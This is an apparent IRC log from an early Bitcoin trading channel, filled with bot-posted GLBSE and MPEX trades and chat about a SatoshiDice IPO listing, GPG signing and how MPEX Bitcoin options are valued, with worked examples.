[+] Aug 20 01:41:06 [GLBSE] [PUREMINING] 2 @ 0.09 = 0.18 BTC [-] Aug 20 01:41:11 [GLBSE] [NYAN.B] 1 @ 1 BTC [-] Aug 20 01:43:52 [GLBSE] [NYAN.C] 3 @ 0.986 = 2.958 BTC [+] Aug 20 01:43:53 [GLBSE] [NYAN.C] 1 @ 0.987 BTC [+] Aug 20 01:44:38 [GLBSE] [BTCMC] 4 @ 0.6901 = 2.7604 BTC [+] Aug 20 01:49:03 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8501 = 3.4004 BTC [-] Aug 20 01:49:04 [GLBSE] [TYGRR.BOND-P] 5 @ 0.85 = 4.25 BTC [-] Aug 20 01:49:05 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [-] Aug 20 01:51:34 [GLBSE] [OBSI.HRPT] 92 @ 0.1 = 9.2 BTC [+] Aug 20 01:53:31 [GLBSE] [ZETA-MINING] 5 @ 0.18399 = 0.92 BTC [+] Aug 20 01:54:28 [GLBSE] [BTCMC] 4 @ 0.6901 = 2.7604 BTC [+] Aug 20 02:07:10 [GLBSE] [GMVT-BOT] 50 @ 0.1 = 5 BTC [+] Aug 20 02:09:24 [GLBSE] [NYAN.C] 1 @ 0.987 BTC [+] Aug 20 02:09:26 [GLBSE] [NYAN.C] 9 @ 0.989 = 8.901 BTC [+] Aug 20 02:09:36 [GLBSE] [BIB.PIRATE] 4 @ 0.7499 = 2.9996 BTC [+] Aug 20 02:09:38 [GLBSE] [BIB.PIRATE] 15 @ 0.75 = 11.25 BTC [+] Aug 20 02:12:48 bitcoins sent in last 24h => 5.593.367!!!! :-O Aug 20 02:13:07 sent where ? Aug 20 02:13:15 and network hashrate => 21TH/s! Aug 20 02:13:24 O.O Aug 20 02:13:47 [GLBSE] [BFLS] 1 @ 1 BTC [-] Aug 20 02:16:01 it's the sum of all the transactions in the last 24hrs Aug 20 02:16:09 so I don't know where, I didn't make a statistic Aug 20 02:16:45 [GLBSE] [YABMC] 4 @ 0.1299 = 0.5196 BTC [+] Aug 20 02:16:46 [GLBSE] [YABMC] 51 @ 0.13 = 6.63 BTC [+] Aug 20 02:16:47 [GLBSE] [YABMC] 3 @ 0.1329 = 0.3987 BTC [+] Aug 20 02:18:05 [MPEX] [S.MPOE] 30474 @ 0.00039009 = 11.8876 BTC [-] Aug 20 02:20:03 [GLBSE] [SS] 3 @ 1.8 = 5.4 BTC [+] Aug 20 02:20:04 [GLBSE] [TEEK.USD] 40 @ 0.0899 = 3.596 BTC [+] Aug 20 02:21:16 [GLBSE] [BITBOND] 9 @ 0.3099 = 2.7891 BTC [-] Aug 20 02:22:07 [GLBSE] [FOO.PPPPT] 3 @ 0.85 = 2.55 BTC [+] Aug 20 02:28:54 [MPEX] [S.MPOE] 6226 @ 0.00038562 = 2.4009 BTC [-] Aug 20 02:28:56 [MPEX] [S.MPOE] 12800 @ 0.00039151 = 5.0113 BTC [+] Aug 20 02:28:57 [MPEX] [S.MPOE] 20437 @ 0.00039578 = 8.0886 BTC [+] Aug 20 02:29:29 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [+] Aug 20 02:35:11 anyone wants to break this http://smpake.com/etc/insta/ Aug 20 02:35:56 interesting kakobrekla Aug 20 02:37:54 anyone know how you obtain the results of gpg --clearsign from kleopatra ? Aug 20 02:40:46 [GLBSE] [BITCOINMINV] 100 @ 0.115 = 11.5 BTC [-] Aug 20 02:41:12 [GLBSE] [JAH] 1 @ 0.13 BTC [+] Aug 20 02:42:24 [GLBSE] [DMC] 1 @ 0.054 BTC [+] Aug 20 02:42:44 [GLBSE] [BITCOINMINV] 3 @ 0.1219999 = 0.366 BTC [+] Aug 20 02:42:46 [GLBSE] [BITCOINMINV] 47 @ 0.1219999 = 5.734 BTC [+] Aug 20 02:44:17 [MPEX] [S.MPOE] 19300 @ 0.00039578 = 7.6386 BTC [+] Aug 20 02:45:52 [GLBSE] [BITCOINMINV] 3 @ 0.1219999 = 0.366 BTC [+] Aug 20 02:46:33 [GLBSE] [BITCOINMINV] 14 @ 0.12295 = 1.7213 BTC [+] Aug 20 02:46:48 ya Aug 20 02:46:59 not interesting enough for anyone to test it Aug 20 02:47:00 :( Aug 20 02:47:08 [GLBSE] [BITCOINMINV] 8 @ 0.12297 = 0.9838 BTC [+] Aug 20 02:48:10 [GLBSE] [NYAN.C] 3 @ 0.987 = 2.961 BTC [-] Aug 20 02:50:20 [MPEX] [O.BTCUSD.C200N] 12 @ 0.0734357 = 0.8812 BTC [-] Aug 20 02:50:21 [MPEX] [O.BTCUSD.C100N] 3 @ 0.21534865 = 0.646 BTC [-] Aug 20 02:51:23 mircea_popescu: it puts it onto the clipboard Aug 20 02:51:30 im pretty sure Aug 20 02:52:03 Gladamas hm ? Aug 20 02:52:33 [MPEX] [F.GIGA.ETF] 8700 @ 0.00093076 = 8.0976 BTC [+] Aug 20 02:52:34 [MPEX] [F.GIGA.ETF] 8796 @ 0.00093319 = 8.2083 BTC [+] Aug 20 02:52:35 [MPEX] [F.GIGA.ETF] 2904 @ 0.00093874 = 2.7261 BTC [+] Aug 20 03:00:36 mircea_popescu: what? Aug 20 03:00:49 anyone know how you obtain the results of gpg --clearsign from kleopatra ? Aug 20 03:01:47 ya well hum. im terying to help someone remotely and it's not looking to great Aug 20 03:01:53 hope to avoid installing kdm ;/ Aug 20 03:02:17 [GLBSE] [TYGRR.BOND-P] 2 @ 0.8699 = 1.7398 BTC [+] Aug 20 03:02:38 ah hmm Aug 20 03:02:46 currently i am getting something that LOOKS like the right thing Aug 20 03:02:47 Detached signature. Aug 20 03:02:52 but gpg dies saying that. Aug 20 03:03:15 any ideea where the exact click has to go in the gui so that it doesn't do that, but instead makes a proper clearsigned document ? Aug 20 03:03:16 [GLBSE] [BITBOND] 6 @ 0.3701 = 2.2206 BTC [+] Aug 20 03:03:37 idk sorry Aug 20 03:05:29 [GLBSE] [TYGRR.BOND-P] 3 @ 0.8001 = 2.4003 BTC [-] Aug 20 03:05:42 [GLBSE] [USD] 5 @ 0.1611 = 0.8055 BTC [+] Aug 20 03:05:50 [GLBSE] [BITBOND] 1 @ 0.3799 BTC [+] Aug 20 03:07:03 [GLBSE] [YABMC] 2 @ 0.1349 = 0.2698 BTC [+] Aug 20 03:09:59 [GLBSE] [TYGRR.BOND-PI] 1 @ 0.999 BTC [+] Aug 20 03:10:01 [GLBSE] [TYGRR.BOND-PI] 2 @ 1 = 2 BTC [+] Aug 20 03:10:02 [GLBSE] [TYGRR.BOND-PI] 46 @ 1 = 46 BTC [+] Aug 20 03:10:03 [GLBSE] [TYGRR.BOND-PI] 122 @ 1 = 122 BTC [+] Aug 20 03:10:04 [GLBSE] [TYGRR.BOND-PI] 1 @ 1 BTC [+] Aug 20 03:10:05 [GLBSE] [TYGRR.BOND-PI] 45 @ 1 = 45 BTC [+] Aug 20 03:10:48 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1002 BTC [+] Aug 20 03:13:03 [GLBSE] [MMM] 3 @ 0.6 = 1.8 BTC [-] Aug 20 03:14:33 [GLBSE] [MMM] 1 @ 0.7 BTC [+] Aug 20 03:15:01 [GLBSE] [TYGRR.BOND-P] 2 @ 0.8699 = 1.7398 BTC [+] Aug 20 03:15:32 kakobrekla i've tried it you know. Aug 20 03:15:43 :) Aug 20 03:16:21 i think i can go public with this Aug 20 03:16:22 [GLBSE] [BITCOINMINV] 25 @ 0.115 = 2.875 BTC [-] Aug 20 03:16:39 just bump the fee up Aug 20 03:16:52 and limits Aug 20 03:17:40 [GLBSE] [YABMC] 1 @ 0.1349 BTC [+] Aug 20 03:18:15 does it work ? Aug 20 03:18:17 cool! Aug 20 03:18:36 [MPEX] [S.MPOE] 32400 @ 0.00038144 = 12.3587 BTC [-] Aug 20 03:18:42 yup Aug 20 03:19:08 zipconf didnt manage to handle what kakobrekla handles in a few hours :p Aug 20 03:20:52 lolz Aug 20 03:20:54 its how it goes. Aug 20 03:21:49 kakobrekla: So, can you handle zip.a? Aug 20 03:21:57 :D Aug 20 03:24:21 umm zipconf is the zip.a? Aug 20 03:25:00 i got whippin 15btc of funds for this on gox Aug 20 03:25:03 Yes. zip.a is the bond that zipconf released... Aug 20 03:25:10 to back the heavy traffic im getting Aug 20 03:25:14 hehe Aug 20 03:25:57 lol Aug 20 03:26:22 Well, you're just starting Aug 20 03:26:35 whats a fair fee for this Aug 20 03:26:45 But I have no doubt you'll make it better than zipconf... Aug 20 03:26:48 nanotube charges 1% for manual afaik Aug 20 03:27:28 as far as i can see its already better since its has at least one working function Aug 20 03:27:39 but yeah i wont brang with this now Aug 20 03:27:40 lolz! Aug 20 03:27:40 lol Aug 20 03:27:53 brag* Aug 20 03:28:46 [GLBSE] [CPA] 1 @ 0.10098 BTC [+] Aug 20 03:31:36 [GLBSE] [BTCS] 76 @ 0.011 = 0.836 BTC [+] Aug 20 03:31:57 [MPEX] [S.MPOE] 5963 @ 0.00039578 = 2.36 BTC [+] Aug 20 03:31:58 [MPEX] [S.MPOE] 42300 @ 0.00039606 = 16.7533 BTC [+] Aug 20 03:32:00 [MPEX] [S.MPOE] 7996 @ 0.00039606 = 3.1669 BTC [+] Aug 20 03:40:42 no! the btc price is go back up. mpex fee is getting less cheaper. heh Aug 20 03:41:52 *going Aug 20 03:42:29 [GLBSE] [TYGRR.BOND-P] 2 @ 0.8001 = 1.6002 BTC [-] Aug 20 03:49:08 ;;ticker Aug 20 03:49:09 Best bid: 9.00147, Best ask: 9.05, Bid-ask spread: 0.04853, Last trade: 9.05, 24 hour volume: 255369, 24 hour low: 7.58, 24 hour high: 11.56192 Aug 20 03:49:53 [GLBSE] [TYGRR.BOND-PI] 32 @ 1 = 32 BTC [+] Aug 20 03:50:58 ok, i got the earth shattering announcement of the year i think. Aug 20 03:50:59 http://polimedia.us/bitcoin/mpex.php?mpsic=S.DICE Aug 20 03:51:27 satoshidice is going up for ipo, you can put bids in. shares will go out starting on the 24th midnight gmt. Aug 20 03:51:31 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8002 BTC [+] Aug 20 03:54:46 bout fucking time Aug 20 03:55:00 mircea took some god damn initiative Aug 20 03:55:05 and got some more people luisted Aug 20 03:55:12 [MPEX] [O.BTCUSD.P130T] 10 @ 0.43777349 = 4.3777 BTC [+] Aug 20 03:55:58 [MPEX] [O.BTCUSD.P120T] 10 @ 0.32694476 = 3.2694 BTC [+] Aug 20 03:56:35 [MPEX] [O.BTCUSD.P110T] 10 @ 0.21611603 = 2.1612 BTC [+] Aug 20 03:57:03 rg the thing is huge. Aug 20 03:57:16 you should see their prospectus. did you know they do 2/3 OF ALL BTC TRANSACTIONS ? Aug 20 03:58:21 [MPEX] [O.BTCUSD.P100T] 10 @ 0.12611388 = 1.2611 BTC [+] Aug 20 04:00:35 [MPEX] [O.BTCUSD.C110N] 1 @ 0.17498433 BTC [-] Aug 20 04:01:15 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [+] Aug 20 04:01:32 [GLBSE] [ASICMINER] 2 @ 0.08120001 = 0.1624 BTC [-] Aug 20 04:03:02 shrug Aug 20 04:03:06 what do they even need to invest for Aug 20 04:03:17 their costs must be close to 0 Aug 20 04:03:17 apparently, print campaign in euro magazines Aug 20 04:03:22 which actually would be great for btc. Aug 20 04:04:14 Tired of not being able to manipulate the stock market cause of market guidelines? Aug 20 04:04:20 Then you need BITCOIN Aug 20 04:04:36 ehehe Aug 20 04:06:26 MadSweeney haha it's pretty cheap already neh ? :D Aug 20 04:11:10 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [+] Aug 20 04:17:28 i could sure use options for hedging my BTCPHP exchange service Aug 20 04:17:47 it cant possibly not be worth it for you then Aug 20 04:24:52 [MPEX] [F.GIGA.ETF] 1296 @ 0.00093874 = 1.2166 BTC [+] Aug 20 04:34:59 I think you should open up sign-ups again for the site. Aug 20 04:35:19 How about a discount window at 5BTC to join Aug 20 04:35:39 I want to use Mpex hehe Aug 20 04:36:28 :D Aug 20 04:36:44 [MPEX] [S.MPOE] 44700 @ 0.00039183 = 17.5148 BTC [-] Aug 20 04:36:45 [MPEX] [S.MPOE] 4720 @ 0.00039347 = 1.8572 BTC [+] Aug 20 04:36:46 [MPEX] [S.MPOE] 5340 @ 0.00039606 = 2.115 BTC [+] Aug 20 04:37:00 actually the fee was scheduled to go to 50 btc once volume passes 50k Aug 20 04:37:11 I still understand how to use the option you have listed yet, I need an example of someone placing an actual order with instruments you have listed. Aug 20 04:37:14 i passed on that because btc had gone to 15, but if it stays at 7 im prolly going to do it. Aug 20 04:37:28 doffx you mean the gpg part is the problem ? Aug 20 04:37:36 No that part is easy Aug 20 04:37:48 ok. then ? Aug 20 04:37:49 I just get what your doing with the option yet Aug 20 04:38:13 For example if I bought 5 O.BTCUSD.C010 at the 24 hour rate Aug 20 04:38:27 When it ends what would I get right now Aug 20 04:38:32 what do you mean at the 24 hour rate. Aug 20 04:38:41 nono. all options expire on the last friday of their month Aug 20 04:38:48 currently T expire on 31th of august Aug 20 04:38:58 N on 28th of september. Aug 20 04:39:29 Ok, so is possible to purchase a call say today Aug 20 04:39:41 And when it expires what exactly does that mean Aug 20 04:40:07 Remember im completly new to options and im sorry if my lack of understanding is frustrating :) Aug 20 04:40:31 If I dont ask any questions ill never get it though. Aug 20 04:41:26 ok, np. Aug 20 04:41:39 so, you buy 1 O.BTCUSD.C050T. Aug 20 04:41:59 at any point up until the 31st of august the value of this option is current btc price - 5 / current btc price. Aug 20 04:42:17 so if price is say 12. value is 12 - 5 / 12 = 0.58333 btc Aug 20 04:42:33 say price is 6. 6 - 5 / 6 = 0.16666 Aug 20 04:42:51 say price is 45. 45 - 5 / 45 = 0.8888 Aug 20 04:42:53 and so on. Aug 20 04:43:09 [MPEX] [S.MPOE] 19354 @ 0.00039606 = 7.6653 BTC [+] Aug 20 04:43:10 [MPEX] [S.MPOE] 37846 @ 0.0003963 = 14.9984 BTC [+] Aug 20 04:43:16 puts go the other way, strike - price / price. Aug 20 04:43:16 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8001 = 3.2004 BTC [-] Aug 20 04:43:17 [GLBSE] [TYGRR.BOND-P] 56 @ 0.8 = 44.8 BTC [-] Aug 20 04:43:53 where do you take cuurent price? mtgox? Aug 20 04:43:56 that make any sense ? Aug 20 04:44:05 current price is published by bitcoincharts, as the 24 hour average Aug 20 04:44:17 yes that did, that seems like a pretty safe bet though Aug 20 04:44:18 http://bitcoincharts.com/markets/currencies/ here Aug 20 04:44:21 scroll down a little. Aug 20 04:44:23 how do you lose on that? Aug 20 04:44:35 well if it goes the right way you win, if it goes the wrong way you lose. Aug 20 04:44:59 you can never lose more than what you paid tho, which is the great appeal of options. Aug 20 04:45:04 there's no forced liquidations etc. Aug 20 04:45:38 [MPEX] [S.MPOE] 24200 @ 0.00038303 = 9.2693 BTC [-] Aug 20 04:46:35 so the loss/win is proportional to price change? Aug 20 04:46:58 Im still confused on a couple parts Aug 20 04:47:22 BTC-Mining well, the further in the money an option is the less selective it is. most gain is for close and out of money options. Aug 20 04:47:25 Doffx shoot Aug 20 04:47:37 Trying to come up with the right question. Aug 20 04:47:40 I don't get it at all Aug 20 04:47:57 Ok using the example you gave Aug 20 04:47:58 What's the difference it makes over just selling/buying BTC? Aug 20 04:48:00 BTC-Mining say price is 10. a C110T is worth very little. Aug 20 04:48:12 aye Aug 20 04:48:15 I see that I can currently buy in at 0.54356433 someone selling 1000 Aug 20 04:48:15 if price moves to say 15, the C110T is now worth 4/15 which is significant. it went up maybe 1000% Aug 20 04:48:23 Doffx that's the bot. Aug 20 04:48:47 BTC-Mining on the other hand, a C020T moves little in value over the same 11 - 15 price change. Aug 20 04:49:18 Sounds kind of like leveraged trading... Aug 20 04:49:33 well it can be used that way. Aug 20 04:49:55 there's a forum link which goesthrough strategies, did i ever give you it ? Aug 20 04:50:17 not sure, but I don't really want to try options or pay the fee for mpex Aug 20 04:50:29 hehe well then k. Aug 20 04:50:51 Id pay the fee if I could figure out how exactly its going to benefit me. Aug 20 04:51:09 well point in case Doffx : Aug 20 04:51:11 lemme look in the logs Aug 20 04:51:14 The last part helped me, now I just dont understand if I purchase at that price what it does Aug 20 04:51:36 Aug 19 14:11:12 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.07120175 = 71.2018 BTC [+] Aug 20 04:51:43 how much does P100T sell for now ? Aug 20 04:52:02 0.06233950 Aug 20 04:52:07 mno Aug 20 04:52:08 [GLBSE] [TYGRR.BOND-PI] 12 @ 1 = 12 BTC [+] Aug 20 04:52:13 O.BTCUSD.P100T 0.12878070 Aug 20 04:52:28 .py (0.12878070 - 0.0712017) * 1000 Aug 20 04:52:29 57.579 Aug 20 04:52:34 that guy made 57btc. Aug 20 04:52:53 Where did you get the .128 from? Aug 20 04:52:58 Oh duh I picked T Aug 20 04:53:05 from the page. search on it for O.BTCUSD.P100T Aug 20 04:53:33 .py 57.579 / 71.2018 Aug 20 04:53:35 0.808673376235 Aug 20 04:53:50 that's an 80% profit in what, 12 hours ? Aug 20 04:54:17 [MPEX] [S.MPOE] 10854 @ 0.0003963 = 4.3014 BTC [+] Aug 20 04:54:18 [MPEX] [S.MPOE] 29463 @ 0.0003965 = 11.6821 BTC [+] Aug 20 04:54:20 Ok I looked at C Aug 20 04:54:23 yea Aug 20 04:54:42 C went to shit cause price went down. when price goes up C is good P is bad. when price goes down the reverse. Aug 20 04:55:11 [GLBSE] [MMM] 6 @ 0.7 = 4.2 BTC [+] Aug 20 04:55:18 and for all the hee-hawing there's absolutely no other place to make 50 bitcoin. Aug 20 04:55:29 sure, you can futz around make 10% over 10 btc or whatever. Aug 20 04:55:41 takes 50 of those. Aug 20 04:56:12 I made 40 BTC trading on MtGox with 320 BTC recently =/ Aug 20 04:56:55 Only 12.5% profit Aug 20 04:58:01 myea. of course this means things can also go badly fast, so it's a mixed blessing. Aug 20 04:58:01 if I had bought that P100T option, I've hedged the 100 btc I purchased @ $12 last week Aug 20 04:58:28 MadSweeney that'd work yea. ideally options are used to hegde, not to try and shoot the 80% return. Aug 20 04:58:31 these rarely work. Aug 20 04:58:57 Ok its starting to come together now Aug 20 05:01:07 I'm sold. I need this for my btc business Aug 20 05:01:48 do you know about pympex ? Aug 20 05:02:39 the python script for mpex interface? Aug 20 05:02:44 yeah. makes things easier Aug 20 05:03:02 well, if you have python at least. Aug 20 05:03:35 [MPEX] [F.GIGA.ETF] 4200 @ 0.00096367 = 4.0474 BTC [+] Aug 20 05:04:12 [GLBSE] [BDT] 1 @ 1.01 BTC [-] Aug 20 05:04:14 [GLBSE] [BDT] 56 @ 1 = 56 BTC [-] Aug 20 05:04:20 mircea_popescu, let me try and use this example and see if you can help me Aug 20 05:04:26 sure. Aug 20 05:04:29 Right now there is a sell qty of 20 Aug 20 05:04:39 at 0.19110000 Aug 20 05:04:46 Lets says I bought that 20 Aug 20 05:04:54 yea Aug 20 05:05:05 And it expired on the 31st at 8.91 btc price Aug 20 05:05:23 How much do you make Aug 20 05:06:19 100 - 8.91 / 8.91 = 0.12233445 Aug 20 05:06:59 ;;ticker Aug 20 05:07:00 Best bid: 8.87, Best ask: 8.9704, Bid-ask spread: 0.10040, Last trade: 8.87, 24 hour volume: 261515, 24 hour low: 7.58, 24 hour high: 11.199 Aug 20 05:08:20 Maybe i'm not getting what this 0.19110000 correlates to. Aug 20 05:09:07 [GLBSE] [BDT] 100 @ 1 = 100 BTC [-] Aug 20 05:09:07 Im seeing it as buying 20 at 3.822 btc Aug 20 05:11:07 yea. Aug 20 05:12:45 Where is the 20 in that math I guess is the question Aug 20 05:13:22 so you buy 20 at 19, for 3.822 Aug 20 05:13:36 and have 20 worth 1222 so 2.444 Aug 20 05:13:43 net loss ~1.4 Aug 20 05:14:01 Ohh!!! Aug 20 05:14:56 the price is 8.87 . if the price moves up (to 8.91 in your example) puts lose money. Aug 20 05:19:16 ;;bids 8 Aug 20 05:19:17 Error: Failure to retrieve order book data. Try again later. Aug 20 05:20:05 it's been borkt. Aug 20 05:21:20 Ok, lets see then. Aug 20 05:21:34 So I basically want to buy in and hope the price goes lower Aug 20 05:22:00 if you think the price goes lower you buy puts Aug 20 05:22:06 if you think it goes higher you buy calls Aug 20 05:22:18 if you think it doesn't move you sell either/both. Aug 20 05:22:26 [MPEX] [S.MPOE] 52700 @ 0.00039338 = 20.7311 BTC [-] Aug 20 05:24:13 [MPEX] [S.MPOE] 7684 @ 0.00039338 = 3.0227 BTC [-] Aug 20 05:24:13 [MPEX] [S.MPOE] 14116 @ 0.0003965 = 5.597 BTC [+] Aug 20 05:26:03 [MPEX] [S.MPOE] 1617751 @ 0.0003965 = 641.4383 BTC [+] Aug 20 05:26:04 [MPEX] [S.MPOE] 16268 @ 0.00039686 = 6.4561 BTC [+] Aug 20 05:26:06 [MPEX] [S.MPOE] 48200 @ 0.00039691 = 19.1311 BTC [+] Aug 20 05:26:07 [MPEX] [S.MPOE] 2700 @ 0.00039703 = 1.072 BTC [+] Aug 20 05:26:08 [MPEX] [S.MPOE] 43200 @ 0.00039786 = 17.1876 BTC [+] Aug 20 05:26:09 [MPEX] [S.MPOE] 18112 @ 0.00039851 = 7.2178 BTC [+] Aug 20 05:26:10 [MPEX] [S.MPOE] 59908 @ 0.00039872 = 23.8865 BTC [+] Aug 20 05:26:11 [MPEX] [S.MPOE] 7200 @ 0.00039896 = 2.8725 BTC [+] Aug 20 05:26:12 [MPEX] [S.MPOE] 32838 @ 0.00039947 = 13.1178 BTC [+] Aug 20 05:26:13 [MPEX] [S.MPOE] 22339 @ 0.00039974 = 8.9298 BTC [+] Aug 20 05:26:14 [MPEX] [S.MPOE] 1629 @ 0.00039992 = 0.6515 BTC [+] Aug 20 05:26:15 [MPEX] [S.MPOE] 53645 @ 0.00040003 = 21.4596 BTC [+] Aug 20 05:26:16 [MPEX] [S.MPOE] 33500 @ 0.00040004 = 13.4013 BTC [+] Aug 20 05:26:17 [MPEX] [S.MPOE] 5276 @ 0.00040044 = 2.1127 BTC [+] Aug 20 05:26:18 [MPEX] [S.MPOE] 29600 @ 0.00040092 = 11.8672 BTC [+] Aug 20 05:26:19 [MPEX] [S.MPOE] 5054 @ 0.00040109 = 2.0271 BTC [+] Aug 20 05:26:20 [MPEX] [S.MPOE] 52197 @ 0.00040121 = 20.942 BTC [+] Aug 20 05:26:21 [MPEX] [S.MPOE] 36800 @ 0.00040127 = 14.7667 BTC [+] Aug 20 05:26:22 [MPEX] [S.MPOE] 20200 @ 0.00040128 = 8.1059 BTC [+] Aug 20 05:26:23 [MPEX] [S.MPOE] 46600 @ 0.00040135 = 18.7029 BTC [+] Aug 20 05:26:24 [MPEX] [S.MPOE] 54542 @ 0.00040151 = 21.8992 BTC [+] Aug 20 05:26:25 [MPEX] [S.MPOE] 36600 @ 0.00040156 = 14.6971 BTC [+] Aug 20 05:26:26 [MPEX] [S.MPOE] 6400 @ 0.00040164 = 2.5705 BTC [+] Aug 20 05:26:27 [MPEX] [S.MPOE] 57000 @ 0.00040178 = 22.9015 BTC [+] Aug 20 05:26:28 [MPEX] [S.MPOE] 29800 @ 0.00040179 = 11.9733 BTC [+] Aug 20 05:26:29 [MPEX] [S.MPOE] 46258 @ 0.0004018 = 18.5865 BTC [+] Aug 20 05:26:30 [MPEX] [S.MPOE] 29300 @ 0.00040215 = 11.783 BTC [+] Aug 20 05:26:30 [MPEX] [S.MPOE] 48026 @ 0.00040237 = 19.3242 BTC [+] Aug 20 05:26:31 [MPEX] [S.MPOE] 1100 @ 0.00040274 = 0.443 BTC [+] Aug 20 05:26:32 [MPEX] [S.MPOE] 24300 @ 0.0004028 = 9.788 BTC [+] Aug 20 05:26:33 [MPEX] [S.MPOE] 4012 @ 0.00040283 = 1.6162 BTC [+] Aug 20 05:26:34 [MPEX] [S.MPOE] 56000 @ 0.0004033 = 22.5848 BTC [+] Aug 20 05:26:35 [MPEX] [S.MPOE] 19700 @ 0.00040331 = 7.9452 BTC [+] Aug 20 05:26:36 [MPEX] [S.MPOE] 7174 @ 0.00040349 = 2.8946 BTC [+] Aug 20 05:26:37 [MPEX] [S.MPOE] 43179 @ 0.00040352 = 17.4236 BTC [+] Aug 20 05:26:38 [MPEX] [S.MPOE] 11498 @ 0.00040385 = 4.6435 BTC [+] Aug 20 05:26:39 [MPEX] [S.MPOE] 40400 @ 0.00040397 = 16.3204 BTC [+] Aug 20 05:26:39 [MPEX] [S.MPOE] 50592 @ 0.0004042 = 20.4493 BTC [+] Aug 20 05:26:40 [MPEX] [S.MPOE] 12000 @ 0.00040428 = 4.8514 BTC [+] Aug 20 05:26:41 [MPEX] [S.MPOE] 6331 @ 0.00040471 = 2.5622 BTC [+] Aug 20 05:26:43 [MPEX] [S.MPOE] 58485 @ 0.00040478 = 23.6736 BTC [+] Aug 20 05:26:44 [MPEX] [S.MPOE] 13900 @ 0.00040489 = 5.628 BTC [+] Aug 20 05:26:45 [MPEX] [S.MPOE] 42600 @ 0.00040495 = 17.2509 BTC [+] Aug 20 05:26:46 [MPEX] [S.MPOE] 47649 @ 0.0004052 = 19.3074 BTC [+] Aug 20 05:26:47 [MPEX] [S.MPOE] 50800 @ 0.00040566 = 20.6075 BTC [+] Aug 20 05:26:48 [MPEX] [S.MPOE] 8440 @ 0.00040569 = 3.424 BTC [+] Aug 20 05:26:48 [MPEX] [S.MPOE] 27900 @ 0.00040632 = 11.3363 BTC [+] Aug 20 05:26:49 [MPEX] [S.MPOE] 12997 @ 0.0004066 = 5.2846 BTC [+] Aug 20 05:27:39 [GLBSE] [ASICMINER] 2 @ 0.0999 = 0.1998 BTC [+] Aug 20 05:27:41 [GLBSE] [ASICMINER] 18 @ 0.1 = 1.8 BTC [+] Aug 20 05:29:22 [GLBSE] [BTC-MINING] 6 @ 0.99991 = 5.9995 BTC [+] Aug 20 05:33:18 [GLBSE] [GIGAMINING] 4 @ 1.0344 = 4.1376 BTC [+] Aug 20 05:33:19 [GLBSE] [GIGAMINING] 6 @ 1.0345 = 6.207 BTC [+] Aug 20 05:36:09 [GLBSE] [PUREMINING] 11 @ 0.13879997 = 1.5268 BTC [+] Aug 20 05:51:18 [MPEX] [S.MPOE] 31300 @ 0.00038543 = 12.064 BTC [-] Aug 20 05:51:19 [MPEX] [S.MPOE] 22500 @ 0.00038303 = 8.6182 BTC [-] Aug 20 05:53:57 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC Aug 20 05:55:13 [GLBSE] [OBSI.HRPT] 80 @ 0.101 = 8.08 BTC [+] Aug 20 05:55:46 [GLBSE] [ASICMINER] 5 @ 0.0999999 = 0.5 BTC [-] Aug 20 05:57:58 [GLBSE] [BDK.BND] 15 @ 0.10275 = 1.5413 BTC [+] Aug 20 05:58:41 [MPEX] [S.MPOE] 15534 @ 0.00039644 = 6.1583 BTC [+] Aug 20 06:02:29 [MPEX] [S.MPOE] 13460 @ 0.00039644 = 5.3361 BTC [+] Aug 20 06:02:29 [MPEX] [S.MPOE] 4840 @ 0.0004066 = 1.9679 BTC [+] Aug 20 06:03:35 https://mtgox.com/api/2/money/order/lag Aug 20 06:03:37 laggy gox Aug 20 06:04:30 oh, is all over the place, ignore me Aug 20 06:06:41 [MPEX] [O.BTCUSD.P090T] 30 @ 0.07369664 = 2.2109 BTC [+] Aug 20 06:08:33 [MPEX] [O.BTCUSD.P130T] 700 @ 0.45062319 = 315.4362 BTC [+] Aug 20 06:08:49 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.33880603 = 338.806 BTC [+] Aug 20 06:08:56 [MPEX] [O.BTCUSD.P100T] 10 @ 0.13147473 = 1.3147 BTC [+] Aug 20 06:09:32 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.22698886 = 226.9889 BTC [+] Aug 20 06:09:35 [MPEX] [O.BTCUSD.P100T] 990 @ 0.13147473 = 130.16 BTC [+] Aug 20 06:09:36 [MPEX] [O.BTCUSD.P100T] 3 @ 0.0384505 = 0.1154 BTC [-] Aug 20 06:09:38 [MPEX] [O.BTCUSD.P100T] 7 @ 0.03647292 = 0.2553 BTC [-] Aug 20 06:09:43 [MPEX] [O.BTCUSD.P090T] 970 @ 0.07369664 = 71.4857 BTC [+] Aug 20 06:09:44 [MPEX] [O.BTCUSD.P090T] 30 @ 0.02035762 = 0.6107 BTC [-] Aug 20 06:11:49 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.22425251 = 224.2525 BTC [-] Aug 20 06:12:34 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.13000185 = 130.0019 BTC [+] Aug 20 06:12:44 ;;ticker Aug 20 06:12:45 Best bid: 9.98001, Best ask: 10.11634, Bid-ask spread: 0.13633, Last trade: 9.98001, 24 hour volume: 281854, 24 hour low: 7.58, 24 hour high: 11.19796 Aug 20 06:12:53 ahahaha so that's what's going on eh Aug 20 06:13:26 [MPEX] [F.GIGA.ETF] 700 @ 0.00096367 = 0.6746 BTC [+] Aug 20 06:14:46 [MPEX] [S.MPOE] 2500 @ 0.00038303 = 0.9576 BTC [-] Aug 20 06:14:47 [MPEX] [S.MPOE] 26900 @ 0.00038144 = 10.2607 BTC [-] Aug 20 06:14:49 [MPEX] [S.MPOE] 10200 @ 0.00037892 = 3.865 BTC [-] Aug 20 06:15:00 [MPEX] [O.BTCUSD.C100T] 5 @ 0.03939127 = 0.197 BTC [-] Aug 20 06:20:13 [GLBSE] [GIPPT] 3 @ 0.98 = 2.94 BTC [+] Aug 20 06:21:56 [MPEX] [S.MPOE] 54800 @ 0.00039899 = 21.8647 BTC [+] Aug 20 06:22:12 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.12997385 = 129.9739 BTC [-] Aug 20 06:22:38 